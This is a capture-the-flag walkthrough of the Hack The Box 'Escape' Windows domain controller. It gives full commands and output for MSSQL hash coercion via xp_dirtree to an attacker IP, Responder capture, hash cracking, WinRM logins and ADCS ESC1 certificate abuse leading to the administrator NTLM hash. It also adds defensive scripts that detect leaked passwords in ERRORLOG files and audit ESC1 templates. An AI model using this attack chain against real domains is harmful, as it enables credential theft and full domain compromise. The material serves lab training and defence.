Escape
Port scan
$ sudo nmap 10.10.11.202 -p- -T4 --min-rate=10000 -sCV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-06 11:28:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-06T11:29:53+00:00; -16h00m07s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-07-06T11:29:54+00:00; -16h00m07s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-06T11:19:35
|_Not valid after: 2054-07-06T11:19:35
|_ssl-date: 2024-07-06T11:29:53+00:00; -16h00m07s from scanner time.
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-07-06T11:29:53+00:00; -16h00m07s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-06T11:29:54+00:00; -16h00m07s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
53808/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -16h00m07s, deviation: 0s, median: -16h00m07s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-06T11:29:16
|_ start_date: N/A
SMB
$ smbclient -L //10.10.11.202/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
$ smbclient //10.10.11.202/Public
smb: \> get "SQL Server Procedures.pdf"
cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<username>" /pass:<password>
PublicUser:GuestUserCantWrite1
MSSQL steal NetNTLM hash / Relay attack
Query SSL certs
$ openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text
$ echo "10.10.11.202 dc.sequel.htb sequel.htb dc" | sudo tee -a /etc/hosts
$ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
> SELECT name, database_id, create_date FROM sys.databases;
> use msdb;
> SELECT name FROM sys.tables;
# Check if xp_cmdshell is enabled
> SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
> sp_configure 'show advanced options', '1'
> RECONFIGURE
# This enables xp_cmdshell
> sp_configure 'xp_cmdshell', '1'
> RECONFIGURE
> EXEC master..xp_cmdshell 'whoami'
Cannot run xp_cmdshell, and PublicUser does not have permission to reconfigure it. But the HackTricks page "Pentesting MSSQL - Microsoft SQL Server" mentions xp_dirtree, an extended stored procedure that is callable by low-privileged logins by default and makes the SQL Server service account authenticate to whatever UNC path it is given.
MSSQL Steal NetNTLM hash / Relay attack | HackTricks
Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
xp_dirtree '\\10.10.16.2\any\thing';
exec master.dbo.xp_dirtree '\\10.10.16.2\any\thing';
$ sudo responder -I tun0
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
REGGIE1234ronnie (sql_svc)
sql_svc
$ evil-winrm -i 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie'
> Get-ChildItem -Path C:\Users\ -Include *.* -File -Recurse -ErrorAction SilentlyContinue
# C:\sqlserver\logs\ERRORLOG.BAK
> type ERRORLOG.BAK
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Watch the timestamps of these error events: the three entries were logged within a few hundredths of a second of each other, and the second "user", NuclearMosquito3, is not shaped like an account name. The likely explanation is a typo: Ryan.Cooper typed his password into the username field, so the password was written to the ERRORLOG in clear text.
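The pattern above (a failed logon for a real account followed, from the same client and within a fraction of a second, by a failed logon for a "user" that is not account-shaped) can be hunted for automatically across an ERRORLOG. The script below is an added example and is not part of the original write-up: it parses the default SQL Server ERRORLOG text format, and the sample input is constructed from the three entries on this page plus two benign lines. The `looks_like_login` heuristic is an assumption about naming conventions (DOMAIN\user, user@domain or first.last) and needs tuning in environments that use bare SQL login names; the flagged value is masked so the tool does not re-log the secret it found.

```python
"""Hunt SQL Server ERRORLOG for passwords typed into the username field.

Added example, not from the original write-up. Assumes the default ERRORLOG
text format: '<timestamp> Logon  Logon failed for user '<name>'. Reason: ...
[CLIENT: <ip>]'. Sample lines below are constructed for this example.
"""
import re
from datetime import datetime

LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*?\[CLIENT: (?P<client>[^\]]+)\]"
)

# Constructed sample: the three entries from the write-up plus two benign failures.
SAMPLE_ERRORLOG = "\n".join([
    "2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]",
    "2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.",
    "2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]",
    "2022-11-18 14:10:00.00 Logon       Logon failed for user 'sequel.htb\\sql_svc'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.9]",
    "2022-11-18 14:10:30.00 Logon       Logon failed for user 'reportreader'. "
    "Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.9]",
])


def parse_failed_logons(text):
    """Return [(timestamp, user, client)] for every 'Logon failed' line, in file order."""
    events = []
    for line in text.splitlines():
        m = LOGON_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events


def looks_like_login(name):
    """Assumed convention: DOMAIN\\user, user@domain or first.last are login-shaped.
    A bare token with no separator is what a pasted password usually looks like."""
    return any(sep in name for sep in ("\\", "@", "."))


def mask(secret):
    """Keep a short prefix for triage; never write the full candidate secret back to a log."""
    return secret[:3] + "*" * max(len(secret) - 3, 0)


def find_password_as_username(text, window_s=2.0):
    """Flag non-login-shaped failures preceded, within window_s seconds and from the
    same client, by a failure for a login-shaped account: that account's password
    has probably been written to the ERRORLOG and should be rotated."""
    events = parse_failed_logons(text)
    findings = []
    for i, (ts, user, client) in enumerate(events):
        if looks_like_login(user):
            continue
        for prev_ts, prev_user, prev_client in reversed(events[:i]):
            delta = (ts - prev_ts).total_seconds()
            if delta > window_s:
                break  # events are in time order, so nothing earlier can be closer
            if prev_client == client and looks_like_login(prev_user):
                findings.append({
                    "account": prev_user,
                    "suspect_secret": mask(user),
                    "client": client,
                    "delta_s": round(delta, 2),
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_password_as_username(SAMPLE_ERRORLOG):
        print(f"rotate {f['account']}: candidate secret {f['suspect_secret']} "
              f"logged {f['delta_s']}s after its failure from {f['client']}")
```

Run it over a real ERRORLOG (or ERRORLOG.BAK, as found here) by reading the file into `find_password_as_username`; every hit is a password-rotation ticket, and the log file itself then needs the same handling as any other secret-bearing artifact.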
Ryan.Cooper
$ evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Identify ADCS
One thing that always needs enumeration on a Windows domain is to look for Active Directory Certificate Services (ADCS). A quick way to check for this is using crackmapexec (and it works as either sql_svc or Ryan.Cooper):
$ crackmapexec ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
ADCS Found PKI Enrollment Server: dc.sequel.htb
ADCS Found CN: sequel-DC-CA
> upload ../Tools/Certify.exe Certify.exe
> .\Certify.exe find /vulnerable
The danger here is that sequel\Domain Users has Enrollment Rights for the certificate template (this is scenario 3 in the Certify README), so any domain user can request a certificate from it.
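Certify's `find /vulnerable` output is not reproduced in the write-up, so the audit below is an added example and is not Certify or Certipy code. It checks the conditions that together make a template ESC1 (published on the CA, enrollment rights for a low-privileged group, no manager approval, no authorized signatures required, ENROLLEE_SUPPLIES_SUBJECT set, and an authentication-capable EKU or no EKU at all) against template dicts whose keys mirror the template's LDAP attribute names, and it reports which single setting change would break the chain. The `UserAuthentication` values are constructed to match the finding above; the real flag values on this box are not shown on the page.

```python
"""ESC1 audit for AD CS certificate templates.

Added example, not Certify/Certipy code. Template dicts are constructed; their
keys mirror the LDAP attributes of a certificate template object, and the flag
bits and EKU OIDs are the documented Microsoft values.
"""

ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CT_FLAG_PEND_ALL_REQUESTS (manager approval)

AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed to match the write-up's finding: Domain Users can enroll, the
# enrollee supplies the subject, and the certificate is valid for client auth.
USER_AUTH_TEMPLATE = {
    "name": "UserAuthentication",
    "published": True,
    "enrollment_rights": ["sequel\\Domain Users", "sequel\\Domain Admins"],
    "mspki-certificate-name-flag": ENROLLEE_SUPPLIES_SUBJECT,
    "mspki-enrollment-flag": 0,
    "mspki-ra-signature": 0,
    "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"],
}
# Two hardened variants of the same template, each breaking the chain differently.
HARDENED_TEMPLATE = {**USER_AUTH_TEMPLATE,
                     "mspki-certificate-name-flag": 0,
                     "mspki-enrollment-flag": PEND_ALL_REQUESTS}
RESTRICTED_TEMPLATE = {**USER_AUTH_TEMPLATE,
                       "enrollment_rights": ["sequel\\Domain Admins"]}

FIXES = {
    "enrollee_supplies_subject": "clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the SAN comes from AD, not the request",
    "low_priv_can_enroll": "remove Enroll from Domain Users / Authenticated Users; grant it only to the group that needs it",
    "no_manager_approval": "set CT_FLAG_PEND_ALL_REQUESTS so a certificate manager approves each request",
}


def esc1_conditions(template):
    """Evaluate each ESC1 precondition separately so the report shows what is already safe."""
    ekus = set(template.get("pkiextendedkeyusage", []))
    enrollers = {p.split("\\", 1)[-1] for p in template.get("enrollment_rights", [])}
    return {
        "published": bool(template.get("published")),
        "low_priv_can_enroll": bool(enrollers & LOW_PRIV_PRINCIPALS),
        "no_manager_approval": not (template.get("mspki-enrollment-flag", 0) & PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("mspki-ra-signature", 0) == 0,
        "enrollee_supplies_subject": bool(template.get("mspki-certificate-name-flag", 0) & ENROLLEE_SUPPLIES_SUBJECT),
        "auth_eku_or_none": not ekus or bool(ekus & AUTH_EKUS),  # no EKU means any purpose
    }


def is_esc1(template):
    """ESC1 requires every condition at once; one missing piece is enough to block it."""
    return all(esc1_conditions(template).values())


def remediation(template):
    """For an ESC1 template, list the settings whose change breaks the chain.
    Any one of them is sufficient; applying more than one is defence in depth."""
    if not is_esc1(template):
        return []
    return [FIXES[key] for key in ("enrollee_supplies_subject", "low_priv_can_enroll", "no_manager_approval")]


if __name__ == "__main__":
    for tpl in (USER_AUTH_TEMPLATE, HARDENED_TEMPLATE, RESTRICTED_TEMPLATE):
        print(tpl["name"], "ESC1" if is_esc1(tpl) else "ok", esc1_conditions(tpl))
        for fix in remediation(tpl):
            print("  -", fix)
```

Feeding real templates means exporting each template's `msPKI-Certificate-Name-Flag`, `msPKI-Enrollment-Flag`, `msPKI-RA-Signature`, `pKIExtendedKeyUsage` and enrollment ACEs from the configuration partition into this dict shape; the point of separating the conditions is that a template which is merely "Domain Users can enroll" is not ESC1 by itself, and the report says which of the other settings is holding the line.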
Abuse Template
With Certify / Rubeus
$ .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
Copy the text from -----BEGIN RSA PRIVATE KEY----- to -----END CERTIFICATE----- into a file called cert.pem and convert it to pfx without a password.
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx
> .\Rubeus.exe asktgt /user:administrator /certificate:C:\users\ryan.cooper\cert.pfx /getcredentials /show /nowrap
NTLM: A52F78E4C751E5F5E17E1E9F3E58F4EE
With Certipy on Kali
$ certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
$ certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target 10.10.11.202 -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
$ certipy-ad auth -pfx administrator.pfx
I can sync the clock with Escape using ntpdate (the nmap scan showed a clock skew of about 16 hours, and Kerberos rejects requests whose timestamp is more than a few minutes away from the KDC's clock):
$ sudo ntpdate -u sequel.htb